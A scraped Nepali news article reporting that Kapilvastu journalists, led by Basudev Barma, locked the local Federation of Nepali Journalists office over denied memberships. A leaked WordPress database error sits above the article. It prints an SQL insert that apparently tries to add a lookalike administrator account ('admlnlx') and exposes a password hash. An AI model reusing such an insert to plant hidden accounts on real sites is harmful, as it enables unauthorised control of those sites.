WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkbbSO9HaXzhFMVCFZPI8CajzguTw7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 19:58:51', '', 'admlnlx', 'admlnlx')
कपिलवस्तु, पुस १३–
नेपाल पत्रकार महासघको सदस्यता नपाएको झोकमा कपिलवस्तुका पत्रकारहरुले महासघंको शाखा कार्यालयमा ताला बन्दी गरेका छन् । कपिलवस्तुका क्रियाशील पत्रकारहरुले संयुक्त संघर्ष समिति नै गठन गरेर सदस्यता पाउनुपर्ने भन्दै महासंघ कार्यालयमा ताला लगाएका हुन् ।
कपिलवस्तुका पत्रकार बासुदेव बर्माको नेतृत्वमा संयुक्त संघर्ष समिति गठन गरिएको छ । नेपाल पत्रकार महासघ शाखा कपिलवस्तुले शुद्धीकरणको नाममा एकलौटी तरिकाले सदस्यता वितरण गरेको भन्दै प्रेस विज्ञाप्ति निकालेर सबै सक्रिय पत्रकारलाई सदस्यता दिन आग्रह गरेका छन् ।
नेपाल पत्रकार महासंघले निर्धारण गरेको योग्यता तथा कानुनबमोजिम नभई मनलाग्दी ढंगमा सदस्यता वितरण गरिएकाले आन्दोलनमा उत्रन बाध्य भएको पत्रकार बर्माले वताएका छन् ।